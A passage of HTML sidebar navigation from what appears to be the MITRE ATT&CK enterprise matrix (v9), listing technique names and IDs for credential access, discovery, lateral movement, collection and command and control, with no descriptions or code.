aria-controls="#enterprise-TA0006-T1003-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0006-T1003-body" aria-labelledby="enterprise-TA0006-T1003-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1003-T1003.001"> <a href="/versions/v9/techniques/T1003/001/"> LSASS Memory </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1003-T1003.002"> <a href="/versions/v9/techniques/T1003/002/"> Security Account Manager </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1003-T1003.003"> <a href="/versions/v9/techniques/T1003/003/"> NTDS </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1003-T1003.004"> <a href="/versions/v9/techniques/T1003/004/"> LSA Secrets </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1003-T1003.005"> <a href="/versions/v9/techniques/T1003/005/"> Cached Domain Credentials </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1003-T1003.006"> <a href="/versions/v9/techniques/T1003/006/"> DCSync </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1003-T1003.007"> <a href="/versions/v9/techniques/T1003/007/"> Proc Filesystem </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1003-T1003.008"> <a href="/versions/v9/techniques/T1003/008/"> /etc/passwd and /etc/shadow </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1528"> <a href="/versions/v9/techniques/T1528/"> Steal Application Access Token </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0006-T1558"> <a href="/versions/v9/techniques/T1558/"> Steal or Forge Kerberos Tickets </a> <div class="expand-button collapsed" id="enterprise-TA0006-T1558-header" data-toggle="collapse" data-target="#enterprise-TA0006-T1558-body" aria-expanded="false" aria-controls="#enterprise-TA0006-T1558-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0006-T1558-body" aria-labelledby="enterprise-TA0006-T1558-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1558-T1558.001"> <a href="/versions/v9/techniques/T1558/001/"> Golden Ticket </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1558-T1558.002"> <a href="/versions/v9/techniques/T1558/002/"> Silver Ticket </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1558-T1558.003"> <a href="/versions/v9/techniques/T1558/003/"> Kerberoasting </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1558-T1558.004"> <a href="/versions/v9/techniques/T1558/004/"> AS-REP Roasting </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1539"> <a href="/versions/v9/techniques/T1539/"> Steal Web Session Cookie </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1111"> <a href="/versions/v9/techniques/T1111/"> Two-Factor Authentication Interception </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0006-T1552"> <a href="/versions/v9/techniques/T1552/"> Unsecured Credentials </a> <div class="expand-button collapsed" id="enterprise-TA0006-T1552-header" data-toggle="collapse" data-target="#enterprise-TA0006-T1552-body" aria-expanded="false" aria-controls="#enterprise-TA0006-T1552-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0006-T1552-body" aria-labelledby="enterprise-TA0006-T1552-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1552-T1552.001"> <a href="/versions/v9/techniques/T1552/001/"> Credentials In Files </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1552-T1552.002"> <a href="/versions/v9/techniques/T1552/002/"> Credentials in Registry </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1552-T1552.003"> <a href="/versions/v9/techniques/T1552/003/"> Bash History </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1552-T1552.004"> <a href="/versions/v9/techniques/T1552/004/"> Private Keys </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1552-T1552.005"> <a href="/versions/v9/techniques/T1552/005/"> Cloud Instance Metadata API </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1552-T1552.006"> <a href="/versions/v9/techniques/T1552/006/"> Group Policy Preferences </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1552-T1552.007"> <a href="/versions/v9/techniques/T1552/007/"> Container API </a> </div> </div> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0007"> <a href="/versions/v9/tactics/TA0007"> Discovery </a> <div class="expand-button collapsed" id="enterprise-TA0007-header" data-toggle="collapse" data-target="#enterprise-TA0007-body" aria-expanded="false" aria-controls="#enterprise-TA0007-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0007-body" aria-labelledby="enterprise-TA0007-header"> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0007-T1087"> <a href="/versions/v9/techniques/T1087/"> Account Discovery </a> <div class="expand-button collapsed" id="enterprise-TA0007-T1087-header" data-toggle="collapse" data-target="#enterprise-TA0007-T1087-body" aria-expanded="false" aria-controls="#enterprise-TA0007-T1087-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0007-T1087-body" aria-labelledby="enterprise-TA0007-T1087-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1087-T1087.001"> <a href="/versions/v9/techniques/T1087/001/"> Local Account </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1087-T1087.002"> <a href="/versions/v9/techniques/T1087/002/"> Domain Account </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1087-T1087.003"> <a href="/versions/v9/techniques/T1087/003/"> Email Account </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1087-T1087.004"> <a href="/versions/v9/techniques/T1087/004/"> Cloud Account </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1010"> <a href="/versions/v9/techniques/T1010/"> Application Window Discovery </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1217"> <a href="/versions/v9/techniques/T1217/"> Browser Bookmark Discovery </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1580"> <a href="/versions/v9/techniques/T1580/"> Cloud Infrastructure Discovery </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1538"> <a href="/versions/v9/techniques/T1538/"> Cloud Service Dashboard </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1526"> <a href="/versions/v9/techniques/T1526/"> Cloud Service Discovery </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1613"> <a href="/versions/v9/techniques/T1613/"> Container and Resource Discovery </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1482"> <a href="/versions/v9/techniques/T1482/"> Domain Trust Discovery </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1083"> <a href="/versions/v9/techniques/T1083/"> File and Directory Discovery </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1046"> <a href="/versions/v9/techniques/T1046/"> Network Service Scanning </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1135"> <a href="/versions/v9/techniques/T1135/"> Network Share Discovery </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1040"> <a href="/versions/v9/techniques/T1040/"> Network Sniffing </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1201"> <a href="/versions/v9/techniques/T1201/"> Password Policy Discovery </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1120"> <a href="/versions/v9/techniques/T1120/"> Peripheral Device Discovery </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0007-T1069"> <a href="/versions/v9/techniques/T1069/"> Permission Groups Discovery </a> <div class="expand-button collapsed" id="enterprise-TA0007-T1069-header" data-toggle="collapse" data-target="#enterprise-TA0007-T1069-body" aria-expanded="false" aria-controls="#enterprise-TA0007-T1069-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0007-T1069-body" aria-labelledby="enterprise-TA0007-T1069-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1069-T1069.001"> <a href="/versions/v9/techniques/T1069/001/"> Local Groups </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1069-T1069.002"> <a href="/versions/v9/techniques/T1069/002/"> Domain Groups </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1069-T1069.003"> <a href="/versions/v9/techniques/T1069/003/"> Cloud Groups </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1057"> <a href="/versions/v9/techniques/T1057/"> Process Discovery </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1012"> <a href="/versions/v9/techniques/T1012/"> Query Registry </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1018"> <a href="/versions/v9/techniques/T1018/"> Remote System Discovery </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0007-T1518"> <a href="/versions/v9/techniques/T1518/"> Software Discovery </a> <div class="expand-button collapsed" id="enterprise-TA0007-T1518-header" data-toggle="collapse" data-target="#enterprise-TA0007-T1518-body" aria-expanded="false" aria-controls="#enterprise-TA0007-T1518-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0007-T1518-body" aria-labelledby="enterprise-TA0007-T1518-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1518-T1518.001"> <a href="/versions/v9/techniques/T1518/001/"> Security Software Discovery </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1082"> <a href="/versions/v9/techniques/T1082/"> System Information Discovery </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1614"> <a href="/versions/v9/techniques/T1614/"> System Location Discovery </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0007-T1016"> <a href="/versions/v9/techniques/T1016/"> System Network Configuration Discovery </a> <div class="expand-button collapsed" id="enterprise-TA0007-T1016-header" data-toggle="collapse" data-target="#enterprise-TA0007-T1016-body" aria-expanded="false" aria-controls="#enterprise-TA0007-T1016-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0007-T1016-body" aria-labelledby="enterprise-TA0007-T1016-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1016-T1016.001"> <a href="/versions/v9/techniques/T1016/001/"> Internet Connection Discovery </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1049"> <a href="/versions/v9/techniques/T1049/"> System Network Connections Discovery </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1033"> <a href="/versions/v9/techniques/T1033/"> System Owner/User Discovery </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1007"> <a href="/versions/v9/techniques/T1007/"> System Service Discovery </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1124"> <a href="/versions/v9/techniques/T1124/"> System Time Discovery </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0007-T1497"> <a href="/versions/v9/techniques/T1497/"> Virtualization/Sandbox Evasion </a> <div class="expand-button collapsed" id="enterprise-TA0007-T1497-header" data-toggle="collapse" data-target="#enterprise-TA0007-T1497-body" aria-expanded="false" aria-controls="#enterprise-TA0007-T1497-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0007-T1497-body" aria-labelledby="enterprise-TA0007-T1497-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1497-T1497.001"> <a href="/versions/v9/techniques/T1497/001/"> System Checks </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1497-T1497.002"> <a href="/versions/v9/techniques/T1497/002/"> User Activity Based Checks </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1497-T1497.003"> <a href="/versions/v9/techniques/T1497/003/"> Time Based Evasion </a> </div> </div> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0008"> <a href="/versions/v9/tactics/TA0008"> Lateral Movement </a> <div class="expand-button collapsed" id="enterprise-TA0008-header" data-toggle="collapse" data-target="#enterprise-TA0008-body" aria-expanded="false" aria-controls="#enterprise-TA0008-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0008-body" aria-labelledby="enterprise-TA0008-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0008-T1210"> <a href="/versions/v9/techniques/T1210/"> Exploitation of Remote Services </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0008-T1534"> <a href="/versions/v9/techniques/T1534/"> Internal Spearphishing </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0008-T1570"> <a href="/versions/v9/techniques/T1570/"> Lateral Tool Transfer </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0008-T1563"> <a href="/versions/v9/techniques/T1563/"> Remote Service Session Hijacking </a> <div class="expand-button collapsed" id="enterprise-TA0008-T1563-header" data-toggle="collapse" data-target="#enterprise-TA0008-T1563-body" aria-expanded="false" aria-controls="#enterprise-TA0008-T1563-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0008-T1563-body" aria-labelledby="enterprise-TA0008-T1563-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0008-T1563-T1563.001"> <a href="/versions/v9/techniques/T1563/001/"> SSH Hijacking </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0008-T1563-T1563.002"> <a href="/versions/v9/techniques/T1563/002/"> RDP Hijacking </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0008-T1021"> <a href="/versions/v9/techniques/T1021/"> Remote Services </a> <div class="expand-button collapsed" id="enterprise-TA0008-T1021-header" data-toggle="collapse" data-target="#enterprise-TA0008-T1021-body" aria-expanded="false" aria-controls="#enterprise-TA0008-T1021-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0008-T1021-body" aria-labelledby="enterprise-TA0008-T1021-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0008-T1021-T1021.001"> <a href="/versions/v9/techniques/T1021/001/"> Remote Desktop Protocol </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0008-T1021-T1021.002"> <a href="/versions/v9/techniques/T1021/002/"> SMB/Windows Admin Shares </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0008-T1021-T1021.003"> <a href="/versions/v9/techniques/T1021/003/"> Distributed Component Object Model </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0008-T1021-T1021.004"> <a href="/versions/v9/techniques/T1021/004/"> SSH </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0008-T1021-T1021.005"> <a href="/versions/v9/techniques/T1021/005/"> VNC </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0008-T1021-T1021.006"> <a href="/versions/v9/techniques/T1021/006/"> Windows Remote Management </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0008-T1091"> <a href="/versions/v9/techniques/T1091/"> Replication Through Removable Media </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0008-T1072"> <a href="/versions/v9/techniques/T1072/"> Software Deployment Tools </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0008-T1080"> <a href="/versions/v9/techniques/T1080/"> Taint Shared Content </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0008-T1550"> <a href="/versions/v9/techniques/T1550/"> Use Alternate Authentication Material </a> <div class="expand-button collapsed" id="enterprise-TA0008-T1550-header" data-toggle="collapse" data-target="#enterprise-TA0008-T1550-body" aria-expanded="false" aria-controls="#enterprise-TA0008-T1550-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0008-T1550-body" aria-labelledby="enterprise-TA0008-T1550-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0008-T1550-T1550.001"> <a href="/versions/v9/techniques/T1550/001/"> Application Access Token </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0008-T1550-T1550.002"> <a href="/versions/v9/techniques/T1550/002/"> Pass the Hash </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0008-T1550-T1550.003"> <a href="/versions/v9/techniques/T1550/003/"> Pass the Ticket </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0008-T1550-T1550.004"> <a href="/versions/v9/techniques/T1550/004/"> Web Session Cookie </a> </div> </div> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0009"> <a href="/versions/v9/tactics/TA0009"> Collection </a> <div class="expand-button collapsed" id="enterprise-TA0009-header" data-toggle="collapse" data-target="#enterprise-TA0009-body" aria-expanded="false" aria-controls="#enterprise-TA0009-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0009-body" aria-labelledby="enterprise-TA0009-header"> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0009-T1560"> <a href="/versions/v9/techniques/T1560/"> Archive Collected Data </a> <div class="expand-button collapsed" id="enterprise-TA0009-T1560-header" data-toggle="collapse" data-target="#enterprise-TA0009-T1560-body" aria-expanded="false" aria-controls="#enterprise-TA0009-T1560-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0009-T1560-body" aria-labelledby="enterprise-TA0009-T1560-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1560-T1560.001"> <a href="/versions/v9/techniques/T1560/001/"> Archive via Utility </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1560-T1560.002"> <a href="/versions/v9/techniques/T1560/002/"> Archive via Library </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1560-T1560.003"> <a href="/versions/v9/techniques/T1560/003/"> Archive via Custom Method </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1123"> <a href="/versions/v9/techniques/T1123/"> Audio Capture </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1119"> <a href="/versions/v9/techniques/T1119/"> Automated Collection </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1115"> <a href="/versions/v9/techniques/T1115/"> Clipboard Data </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1530"> <a href="/versions/v9/techniques/T1530/"> Data from Cloud Storage Object </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0009-T1602"> <a href="/versions/v9/techniques/T1602/"> Data from Configuration Repository </a> <div class="expand-button collapsed" id="enterprise-TA0009-T1602-header" data-toggle="collapse" data-target="#enterprise-TA0009-T1602-body" aria-expanded="false" aria-controls="#enterprise-TA0009-T1602-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0009-T1602-body" aria-labelledby="enterprise-TA0009-T1602-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1602-T1602.001"> <a href="/versions/v9/techniques/T1602/001/"> SNMP (MIB Dump) </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1602-T1602.002"> <a href="/versions/v9/techniques/T1602/002/"> Network Device Configuration Dump </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0009-T1213"> <a href="/versions/v9/techniques/T1213/"> Data from Information Repositories </a> <div class="expand-button collapsed" id="enterprise-TA0009-T1213-header" data-toggle="collapse" data-target="#enterprise-TA0009-T1213-body" aria-expanded="false" aria-controls="#enterprise-TA0009-T1213-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0009-T1213-body" aria-labelledby="enterprise-TA0009-T1213-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1213-T1213.001"> <a href="/versions/v9/techniques/T1213/001/"> Confluence </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1213-T1213.002"> <a href="/versions/v9/techniques/T1213/002/"> Sharepoint </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1005"> <a href="/versions/v9/techniques/T1005/"> Data from Local System </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1039"> <a href="/versions/v9/techniques/T1039/"> Data from Network Shared Drive </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1025"> <a href="/versions/v9/techniques/T1025/"> Data from Removable Media </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0009-T1074"> <a href="/versions/v9/techniques/T1074/"> Data Staged </a> <div class="expand-button collapsed" id="enterprise-TA0009-T1074-header" data-toggle="collapse" data-target="#enterprise-TA0009-T1074-body" aria-expanded="false" aria-controls="#enterprise-TA0009-T1074-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0009-T1074-body" aria-labelledby="enterprise-TA0009-T1074-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1074-T1074.001"> <a href="/versions/v9/techniques/T1074/001/"> Local Data Staging </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1074-T1074.002"> <a href="/versions/v9/techniques/T1074/002/"> Remote Data Staging </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0009-T1114"> <a href="/versions/v9/techniques/T1114/"> Email Collection </a> <div class="expand-button collapsed" id="enterprise-TA0009-T1114-header" data-toggle="collapse" data-target="#enterprise-TA0009-T1114-body" aria-expanded="false" aria-controls="#enterprise-TA0009-T1114-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0009-T1114-body" aria-labelledby="enterprise-TA0009-T1114-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1114-T1114.001"> <a href="/versions/v9/techniques/T1114/001/"> Local Email Collection </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1114-T1114.002"> <a href="/versions/v9/techniques/T1114/002/"> Remote Email Collection </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1114-T1114.003"> <a href="/versions/v9/techniques/T1114/003/"> Email Forwarding Rule </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0009-T1056"> <a href="/versions/v9/techniques/T1056/"> Input Capture </a> <div class="expand-button collapsed" id="enterprise-TA0009-T1056-header" data-toggle="collapse" data-target="#enterprise-TA0009-T1056-body" aria-expanded="false" aria-controls="#enterprise-TA0009-T1056-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0009-T1056-body" aria-labelledby="enterprise-TA0009-T1056-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1056-T1056.001"> <a href="/versions/v9/techniques/T1056/001/"> Keylogging </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1056-T1056.002"> <a href="/versions/v9/techniques/T1056/002/"> GUI Input Capture </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1056-T1056.003"> <a href="/versions/v9/techniques/T1056/003/"> Web Portal Capture </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1056-T1056.004"> <a href="/versions/v9/techniques/T1056/004/"> Credential API Hooking </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1185"> <a href="/versions/v9/techniques/T1185/"> Man in the Browser </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0009-T1557"> <a href="/versions/v9/techniques/T1557/"> Man-in-the-Middle </a> <div class="expand-button collapsed" id="enterprise-TA0009-T1557-header" data-toggle="collapse" data-target="#enterprise-TA0009-T1557-body" aria-expanded="false" aria-controls="#enterprise-TA0009-T1557-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0009-T1557-body" aria-labelledby="enterprise-TA0009-T1557-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1557-T1557.001"> <a href="/versions/v9/techniques/T1557/001/"> LLMNR/NBT-NS Poisoning and SMB Relay </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1557-T1557.002"> <a href="/versions/v9/techniques/T1557/002/"> ARP Cache Poisoning </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1113"> <a href="/versions/v9/techniques/T1113/"> Screen Capture </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1125"> <a href="/versions/v9/techniques/T1125/"> Video Capture </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0011"> <a href="/versions/v9/tactics/TA0011"> Command and Control </a> <div class="expand-button collapsed" id="enterprise-TA0011-header" data-toggle="collapse" data-target="#enterprise-TA0011-body" aria-expanded="false" aria-controls="#enterprise-TA0011-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0011-body" aria-labelledby="enterprise-TA0011-header"> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0011-T1071"> <a href="/versions/v9/techniques/T1071/"> Application Layer Protocol </a> <div class="expand-button collapsed" id="enterprise-TA0011-T1071-header" data-toggle="collapse" data-target="#enterprise-TA0011-T1071-body" aria-expanded="false" aria-controls="#enterprise-TA0011-T1071-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0011-T1071-body" aria-labelledby="enterprise-TA0011-T1071-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1071-T1071.001"> <a href="/versions/v9/techniques/T1071/001/"> Web Protocols </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1071-T1071.002"> <a href="/versions/v9/techniques/T1071/002/"> File Transfer Protocols </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1071-T1071.003"> <a href="/versions/v9/techniques/T1071/003/"> Mail Protocols </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1071-T1071.004"> <a href="/versions/v9/techniques/T1071/004/"> DNS </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1092"> <a href="/versions/v9/techniques/T1092/"> Communication Through Removable Media </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0011-T1132"> <a href="/versions/v9/techniques/T1132/"> Data Encoding </a> <div class="expand-button collapsed" id="enterprise-TA0011-T1132-header" data-toggle="collapse" data-target="#enterprise-TA0011-T1132-body" aria-expanded="false" aria-controls="#enterprise-TA0011-T1132-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0011-T1132-body" aria-labelledby="enterprise-TA0011-T1132-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1132-T1132.001"> <a href="/versions/v9/techniques/T1132/001/"> Standard Encoding </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1132-T1132.002"> <a href="/versions/v9/techniques/T1132/002/"> Non-Standard Encoding </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0011-T1001"> <a href="/versions/v9/techniques/T1001/"> Data Obfuscation </a> <div class="expand-button collapsed" id="enterprise-TA0011-T1001-header" data-toggle="collapse" data-target="#enterprise-TA0011-T1001-body" aria-expanded="false" aria-controls="#enterprise-TA0011-T1001-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0011-T1001-body" aria-labelledby="enterprise-TA0011-T1001-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1001-T1001.001"> <a href="/versions/v9/techniques/T1001/001/"> Junk Data </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1001-T1001.002"> <a href="/versions/v9/techniques/T1001/002/"> Steganography </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1001-T1001.003"> <a href="/versions/v9/techniques/T1001/003/"> Protocol Impersonation </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0011-T1568"> <a href="/versions/v9/techniques/T1568/"> Dynamic Resolution </a> <div class="expand-button collapsed" id="enterprise-TA0011-T1568-header" data-toggle="collapse" data-target="#enterprise-TA0011-T1568-body" aria-expanded="false" aria-controls="#enterprise-TA0011-T1568-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0011-T1568-body" aria-labelledby="enterprise-TA0011-T1568-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1568-T1568.001"> <a href="/versions/v9/techniques/T1568/001/"> Fast Flux DNS </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" 